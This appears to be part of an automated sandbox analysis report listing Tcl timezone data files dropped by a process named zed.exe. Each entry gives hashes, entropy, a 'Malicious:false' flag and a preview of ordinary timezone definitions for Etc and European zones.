                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/GMT0) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):163
                                                                                                                                                                                                                                            Entropy (8bit):4.911342539638601
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqSsM4DovXHAIgexovYovHRL/yRp+FB5yRDMovn:SlSWB9vsM3yFXHAIgnvVHN/yRp6BURQy
                                                                                                                                                                                                                                            MD5:CDD2DE9CF0FECFEA0CDD32DAC32DCDE2
                                                                                                                                                                                                                                            SHA1:311CD4C6E819E18BAAACC382F81359BC208E2F73
                                                                                                                                                                                                                                            SHA-256:F89167B6117838D9679C0397496B6D96D3A7BEAEF0BD99406ABACDBDB658FBCC
                                                                                                                                                                                                                                            SHA-512:1AF061D07D2F579A089905B6B259AABD7C58F4FA0CD379EE54206164F0DCAEA5C720FB1F5E76F5782F8613E62D8F83BD55F1848D5D7A73D4A5C9F7BC6B9F5DB1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/GMT)]} {.. LoadTimeZoneFile Etc/GMT..}..set TZData(:Etc/Greenwich) $TZData(:Etc/GMT)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                                                            Entropy (8bit):4.838936002050477
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRKh8RFB:SlSWB9vsM3yzTHAIgm6N/yR68RX
                                                                                                                                                                                                                                            MD5:0587EB7D1B1C684A4A0F90D3CB0959C8
                                                                                                                                                                                                                                            SHA1:3F2840AE512774494D9A0B6357C52CCB7DBA5265
                                                                                                                                                                                                                                            SHA-256:0856D14DBBC53D46460BCD530BD070E9E8966D1C96BA01BA556E215A98C09CD4
                                                                                                                                                                                                                                            SHA-512:DE38EF28893853219AC24AE4A522307ADAA1502F6D0C129219FAD9D75CFCE03A505C3E0758CFF2D2D4F7101414A5F7E4FC1C1B119B667E6A9C89B60DDA641E86
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/UCT) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):110
                                                                                                                                                                                                                                            Entropy (8bit):4.903699772785336
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/yRF3yFNMXGm2OHvL:SlSWB9eg/yR9SDm2OHj
                                                                                                                                                                                                                                            MD5:3D3F94B6AC5FA232E509356C703D9177
                                                                                                                                                                                                                                            SHA1:502B8EE9D4A1EA75A91272181AC87B9B6ECE1F84
                                                                                                                                                                                                                                            SHA-256:4D74D9EC2397B1708FEF47806294B0BCA26679F3A63149AE24E4E0C641976970
                                                                                                                                                                                                                                            SHA-512:205A761A01C577F602236CB5C9938C834B7F3F9F681B94036B0A86101119893EF87D206D0C3F7737075ED833D4E35E374ACAE6605163E9C37B705D99BEBC928C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Etc/UTC) {.. {-9223372036854775808 0 0 UTC}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):163
                                                                                                                                                                                                                                            Entropy (8bit):4.874807282103623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRYzXDJMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/yRY7VMr8RX
                                                                                                                                                                                                                                            MD5:65E28EFF342B625E79175793FD38F9FD
                                                                                                                                                                                                                                            SHA1:08B11474822E670DEAB8F0EA168BAED7D5E3DBE1
                                                                                                                                                                                                                                            SHA-256:A2B62C5914DE169A68A018A5B47C1253DBCA10A251862D17B0781ECFD19B6192
                                                                                                                                                                                                                                            SHA-512:79641D0E05F81BFB80034937D34E74B7483A790F33C1F9A0FA92C6A7913AC8C03036CFDEFB43850B84EFB3DD3C4A39022DC8F22E5B5DE6353586A546E03A5789
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/Universal) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):158
                                                                                                                                                                                                                                            Entropy (8bit):4.874356623237119
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/yRaQEBURFB:SlSWB9vsM3yzTHAIgm6N/yRYaRX
                                                                                                                                                                                                                                            MD5:EDABCAC858EC9632D5D8DCCFB28F4D6E
                                                                                                                                                                                                                                            SHA1:E5BEF1367A97A1900749CE6B1E01CF32F582BDD9
                                                                                                                                                                                                                                            SHA-256:BBD6E93206FF3B7017AFBE63905B4C932C422B582F3CE2A79A7B885D390EE555
                                                                                                                                                                                                                                            SHA-512:3A22364D423F2F970123561408018A2B72F43C4978836D3B6DF7517217445605838DCB8DDBDA204FD01C49A4A7D5ADAD4CA8BDA7C3B412D54750BAEAA589B683
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Etc/Zulu) $TZData(:Etc/UTC)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.892809684252761
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/So3vXHAIgoq82yHRL/yQaiFAXowQahCv:SlSWB9vsM3ymhS2HAIgoh26N/ywAXoww
                                                                                                                                                                                                                                            MD5:B0B409D665190569A56697799FBA5CD3
                                                                                                                                                                                                                                            SHA1:840AA7D61E64ACE61FDDAB96F716575A61CEDB52
                                                                                                                                                                                                                                            SHA-256:46141E7BC0F99D2117319C661569F8B38AF7D00108CED5784FA3A3B5090EF8E9
                                                                                                                                                                                                                                            SHA-512:D7C0588D98AC46B5191D7C7E8F5181E94306EFFCC9E3F2DBA9E0003BAE51D992334527ADDD6D0C9701CFD60169A74984B3401E7A6A1322A734BC3D90DCC933BC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Brussels)]} {.. LoadTimeZoneFile Europe/Brussels..}..set TZData(:Europe/Amsterdam) $TZData(:Europe/Brussels)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6927
                                                                                                                                                                                                                                            Entropy (8bit):3.8182041031531897
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:CA34elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:CI41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:D897DCA686A03495EB2C3323FAB0BEAD
                                                                                                                                                                                                                                            SHA1:1433BC303DE92F7B36F881C8595A42B35E0814FC
                                                                                                                                                                                                                                            SHA-256:F0B48DA7CA3659450D87CC0DDFDDFD28B464543DF1EE40D935C44D5CD7C9B9B3
                                                                                                                                                                                                                                            SHA-512:A1C4AE1E0EC26B159B0F5D058A7A77B8774F611A4D3C6AECEDD7186957D6BD9F15CDFCBA248FCC8A4B4146BD72CD7D66B9F88A2BF7CDEF416F1831A2F335D48C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Andorra) {.. {-9223372036854775808 364 0 LMT}.. {-2177453164 0 0 WET}.. {-733881600 3600 0 CET}.. {481078800 7200 0 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 3600 0 CET}.. {733280400 7200 1 CEST}.. {749005200 3600 0 CET}.. {764730000 7200 1 CEST}.. {780454800 3600 0 CET}.. {796179600 7200 1 CEST}.. {811904400 3600 0 CET}.. {828234000 7200 1 CEST}.. {846378000 3600 0 CET}.. {859683600 7200 1 CEST}.. {877827600 3600 0 CET}.. {891133200 7200 1 CEST}.. {909277200 3600 0 CET}.. {922582800 7200 1 CEST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2063
                                                                                                                                                                                                                                            Entropy (8bit):3.679377249443024
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:TvCAs6kKR6aQmF1cSNWrI+AjXgV/Ap40FjDOP:rCAs6kC6aZF1cSN4I+AjXgV/ApDFjDM
                                                                                                                                                                                                                                            MD5:CB860328FA96A14055BF51A3B2D35A08
                                                                                                                                                                                                                                            SHA1:CFA49DC861F4AC3D29A78D63D71C2D6D83D68F84
                                                                                                                                                                                                                                            SHA-256:4B5FB0AF225974D117374028285F20A02B833FF4136E6BFAE7B65E6D6D28829E
                                                                                                                                                                                                                                            SHA-512:960152826F4245012462E53F80B69B0C45C27D75D46C70D485674CA19071DF268671C7691B614BE53B9E7BD8CFEC5D24F3DCF933F2F14D827F2A32EB347D7540
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Astrakhan) {.. {-9223372036854775808 11532 0 LMT}.. {-1441249932 10800 0 +03}.. {-1247540400 14400 0 +05}.. {354916800 18000 1 +05}.. {370724400 14400 0 +04}.. {386452800 18000 1 +05}.. {402260400 14400 0 +04}.. {417988800 18000 1 +05}.. {433796400 14400 0 +04}.. {449611200 18000 1 +05}.. {465343200 14400 0 +04}.. {481068000 18000 1 +05}.. {496792800 14400 0 +04}.. {512517600 18000 1 +05}.. {528242400 14400 0 +04}.. {543967200 18000 1 +05}.. {559692000 14400 0 +04}.. {575416800 18000 1 +05}.. {591141600 14400 0 +04}.. {606866400 10800 0 +04}.. {606870000 14400 1 +04}.. {622594800 10800 0 +03}.. {638319600 14400 1 +04}.. {654649200 10800 0 +03}.. {670374000 14400 0 +04}.. {701820000 10800 0 +04}.. {701823600 14400 1 +04}.. {717548400 10800 0 +03}.. {733273200 14400 1 +04}.. {748998000 10800 0 +03}.. {764722800 14400 1 +04}.. {7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7954
                                                                                                                                                                                                                                            Entropy (8bit):3.7252594544513795
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:1D/8QdzFu+f+uO7DVopaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYf:Z/8ohvyDjivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:8B2C99E1CD04D7559709FDF8D382343C
                                                                                                                                                                                                                                            SHA1:C595D5159C742B815AF89EC8604376E01291F9F1
                                                                                                                                                                                                                                            SHA-256:47353319419505AAB205C23F8C97EA0B12E5DED2113147794F77B67349AFF52F
                                                                                                                                                                                                                                            SHA-512:227CA21A3B6160357988582E261A62AE7B09D46D479EABFAC8039185D710EFA765CD1694F4388EBF8800978A1E1DB69F6AF9BB9BF82C0FCD66E883930E1F8249
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Athens) {.. {-9223372036854775808 5692 0 LMT}.. {-2344642492 5692 0 AMT}.. {-1686101632 7200 0 EET}.. {-1182996000 10800 1 EEST}.. {-1178161200 7200 0 EET}.. {-906861600 10800 1 EEST}.. {-904878000 7200 0 CEST}.. {-857257200 3600 0 CET}.. {-844477200 7200 1 CEST}.. {-828237600 3600 0 CET}.. {-812422800 7200 0 EET}.. {-552362400 10800 1 EEST}.. {-541652400 7200 0 EET}.. {166485600 10800 1 EEST}.. {186184800 7200 0 EET}.. {198028800 10800 1 EEST}.. {213753600 7200 0 EET}.. {228873600 10800 1 EEST}.. {244080000 7200 0 EET}.. {260323200 10800 1 EEST}.. {275446800 7200 0 EET}.. {291798000 10800 1 EEST}.. {307407600 7200 0 EET}.. {323388000 10800 1 EEST}.. {338936400 7200 0 EET}.. {347148000 7200 0 EET}.. {354675600 10800 1 EEST}.. {370400400 7200 0 EET}.. {386125200 10800 1 EEST}.. {401850000 7200 0 EET}.. {417574800 10800 1 EEST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.876296755647751
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxKL823vXHAIgoqyKL8H6RL/yQahs3QavKL81n:SlSWB9vsM3ymvKA2PHAIgovKAH6N/y72
                                                                                                                                                                                                                                            MD5:7160C6EE32380846653F016AE8AFD52A
                                                                                                                                                                                                                                            SHA1:DE7805089639C54893F2107FA67342DA72A79BBC
                                                                                                                                                                                                                                            SHA-256:557023674F6E8376707517103EE69C1DEBBE53CDD4BCAB11E763CC53B9CB1908
                                                                                                                                                                                                                                            SHA-512:FDBDECBBDB0C419226E2604608FD2923CFB06E4B6948493208FD83FD796880E81F6147C0FAFEB572079C9C916831B7B055620EC939164CCA1DAF76897BE60F2C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/London)]} {.. LoadTimeZoneFile Europe/London..}..set TZData(:Europe/Belfast) $TZData(:Europe/London)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7309
                                                                                                                                                                                                                                            Entropy (8bit):3.8204712502914653
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:lp+/4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxOrnW+:lY41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:02A003411B61A311896A6407B622152A
                                                                                                                                                                                                                                            SHA1:3B8BC6D1AF698CE7BB14A08307F5A4295EB8ED03
                                                                                                                                                                                                                                            SHA-256:74B225511B518B0CED972CBB33D694697712CCB96A6D81E0F50ADA28CF6E2C92
                                                                                                                                                                                                                                            SHA-512:9E03B3EB1E528E5B1ADBA09F808E73BF9C4314EDCBF6F96E46844D51A5F425BED3EE8FD5BA8706C46A7FB9882485F119F81996F2EAB7E1E9B598978C402DDE0F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Belgrade) {.. {-9223372036854775808 4920 0 LMT}.. {-2713915320 3600 0 CET}.. {-905824800 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-777942000 7200 1 CEST}.. {-766623600 3600 0 CET}.. {407199600 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200 1 CEST}.. {496803600 3600 0 CET}.. {512528400 7200 1 CEST}.. {528253200 3600 0 CET}.. {543978000 7200 1 CEST}.. {559702800 3600 0 CET}.. {575427600 7200 1 CEST}.. {591152400 3600 0 CET}.. {606877200 7200 1 CEST}.. {622602000 3600 0 CET}.. {638326800 7200 1 CEST}.. {654656400 3600 0 CET}.. {670381200 7200 1 CEST}.. {686106000 3600 0 CET}.. {701830800 7200 1 CEST}.. {717555600 360
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8020
                                                                                                                                                                                                                                            Entropy (8bit):3.820756136386754
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Pi9+qFR274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:PQs41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:84027C3C8315BD479B38DE11F38E873F
                                                                                                                                                                                                                                            SHA1:6E92A2A9734A9C6B02ECCD99F114D667C909C5BA
                                                                                                                                                                                                                                            SHA-256:7E7111F06288069B52A4E1CA0B016216DF9328FB3B1560A740146497CCDD4D24
                                                                                                                                                                                                                                            SHA-512:5FFDE523021FC0C490261F55999204C9CE6C8C274888525EA6EE7C01BC5CCABC7A3877FD454B4167D81F4B89BACB087E8BA6AB0BAC46C2874ED9257BE2092340
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Berlin) {.. {-9223372036854775808 3208 0 LMT}.. {-2422054408 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-776559600 10800 0 CEMT}.. {-765936000 7200 1 CEST}.. {-761180400 3600 0 CET}.. {-757386000 3600 0 CET}.. {-748479600 7200 1 CEST}.. {-733273200 3600 0 CET}.. {-717631200 7200 1 CEST}.. {-714610800 10800 1 CEMT}.. {-710380800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-684975600 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {315529200 3600 0 CET}.. {323830800 7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.943205109348136
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVtXrAeovXHAIgoquXrsY6RL/yQahcvEB5yQazXrH:SlSWB9vsM3ymzbAeSHAIgozbsY6N/y7c
                                                                                                                                                                                                                                            MD5:C69AB60BE74D4BB7E31BE4E5ECCD8FD2
                                                                                                                                                                                                                                            SHA1:9DD0BA6171080F074858EF88ADA2E91C1F465619
                                                                                                                                                                                                                                            SHA-256:1D7C539AAA1E3AD5EF3574A629523B5B781F1A91D352C9B39B8DE7316756026E
                                                                                                                                                                                                                                            SHA-512:C273B97CCFB5F328EB7A13CCA3126DE8D91B3876CBD248990C0BE063DDBE5B0F31EA138E31A1C5C43B1ABCF42EA511448E6DC589EB99E8172D7C2A68BA31A8E7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Prague)]} {.. LoadTimeZoneFile Europe/Prague..}..set TZData(:Europe/Bratislava) $TZData(:Europe/Prague)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):9223
                                                                                                                                                                                                                                            Entropy (8bit):3.8450929464870804
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:RhcSQnG1Czyc1+FdDKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcM:Rh8zyc4Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:E6C1153C3F71C8C005D7A46DDF6461FB
                                                                                                                                                                                                                                            SHA1:CBDF7D5D36AF57D83859C910B493464617EC9571
                                                                                                                                                                                                                                            SHA-256:1402A2072ADC9EBB35F4C0368D2E9A7A11493626C667C022614FFB7CC05B6CB6
                                                                                                                                                                                                                                            SHA-512:8B1B47678F75DBE59DB08E034F0701BD11FF4FD3AD0304C8ABF45E848F717D2787B8E47558D3C334D369E0938C633DC217178D3EAE6486CEFBE25CF1668479F6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Brussels) {.. {-9223372036854775808 1050 0 LMT}.. {-2840141850 1050 0 BMT}.. {-2450995200 0 0 WET}.. {-1740355200 3600 0 CET}.. {-1693702800 7200 0 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1613826000 0 0 WET}.. {-1604278800 3600 1 WEST}.. {-1585530000 0 0 WET}.. {-1574038800 3600 1 WEST}.. {-1552266000 0 0 WET}.. {-1539997200 3600 1 WEST}.. {-1520557200 0 0 WET}.. {-1507510800 3600 1 WEST}.. {-1490576400 0 0 WET}.. {-1473642000 3600 1 WEST}.. {-1459126800 0 0 WET}.. {-1444006800 3600 1 WEST}.. {-1427677200 0 0 WET}.. {-1411952400 3600 1 WEST}.. {-1396227600 0 0 WET}.. {-1379293200 3600 1 WEST}.. {-1364778000 0 0 WET}.. {-1348448400 3600 1 WEST}.. {-1333328400 0 0 WET}.. {-1316394000 3600 1 WEST}.. {-1301263200 0 0 WET}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7974
                                                                                                                                                                                                                                            Entropy (8bit):3.7264631277913853
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:vMSsQMAz5CXNU5paNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBK0:vMS1kdUoivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                                            MD5:88DB5686937D3499A8142413B2CF2EB5
                                                                                                                                                                                                                                            SHA1:E37BAD2127553600D0E38A43053D1B07B2498DA8
                                                                                                                                                                                                                                            SHA-256:C560D45104A8DD73FC7370B5AC1615E22043DBC93DFB46A9ECC6468C2D38B19A
                                                                                                                                                                                                                                            SHA-512:375B8A63CFF2E278CD8C78BF9DBC86288FFB1AD57DAED00CD2199F0B05F4FBFA7D17D93C6458B20B86F6D05F3E3A49D594E60AC97DDB47141E21D7CDE10F8456
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Bucharest) {.. {-9223372036854775808 6264 0 LMT}.. {-2469404664 6264 0 BMT}.. {-1213148664 7200 0 EET}.. {-1187056800 10800 1 EEST}.. {-1175479200 7200 0 EET}.. {-1159754400 10800 1 EEST}.. {-1144029600 7200 0 EET}.. {-1127700000 10800 1 EEST}.. {-1111975200 7200 0 EET}.. {-1096250400 10800 1 EEST}.. {-1080525600 7200 0 EET}.. {-1064800800 10800 1 EEST}.. {-1049076000 7200 0 EET}.. {-1033351200 10800 1 EEST}.. {-1017626400 7200 0 EET}.. {-1001901600 10800 1 EEST}.. {-986176800 7200 0 EET}.. {-970452000 10800 1 EEST}.. {-954727200 7200 0 EET}.. {296604000 10800 1 EEST}.. {307486800 7200 0 EET}.. {323816400 10800 1 EEST}.. {338940000 7200 0 EET}.. {354672000 10800 0 EEST}.. {370396800 7200 0 EET}.. {386121600 10800 1 EEST}.. {401846400 7200 0 EET}.. {417571200 10800 1 EEST}.. {433296000 7200 0 EET}.. {449020800 10800 1 EEST}.. {465
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8287
                                                                                                                                                                                                                                            Entropy (8bit):3.8244305880244567
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:rHw0+D5xp4elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhltlUxo:rQXj41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                                            MD5:11468F958796F971ADD5FB1A0C426D78
                                                                                                                                                                                                                                            SHA1:3FA58BEF391BCF7BAC6A124D093B6505B4EAC452
                                                                                                                                                                                                                                            SHA-256:B58F3E9066B8B57EB037D509636AA67A06ACC8348BE6C48482D87CDC49844A4E
                                                                                                                                                                                                                                            SHA-512:0492EABD6EE16392C00A196AF38995E5F9E55E30A82A50EFFB381DC978E9E63E801555CDC219869E6251BD51115972F742D8A7D9524372B8B11702AE4B28BFB7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Europe/Budapest) {.. {-9223372036854775808 4580 0 LMT}.. {-2498260580 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1640998800 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-1600470000 7200 1 CEST}.. {-1587250800 3600 0 CET}.. {-1569711600 7200 1 CEST}.. {-1555196400 3600 0 CET}.. {-906775200 3600 0 CET}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-788922000 3600 0 CET}.. {-778471200 7200 1 CEST}.. {-762656400 3600 0 CET}.. {-749689200 7200 1 CEST}.. {-733276800 3600 0 CET}.. {-717634800 7200 1 CEST}.. {-701910000 3600 0 CET}.. {-686185200 7200 1 CEST}.. {-670460400 3600 0 CET}.. {-654130800 7200 1 CEST}.. {-639010800 3600 0 CET}.. {-492656400 7
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.952483060656419
                                                                                                                                                                                                                                            Encrypted:false
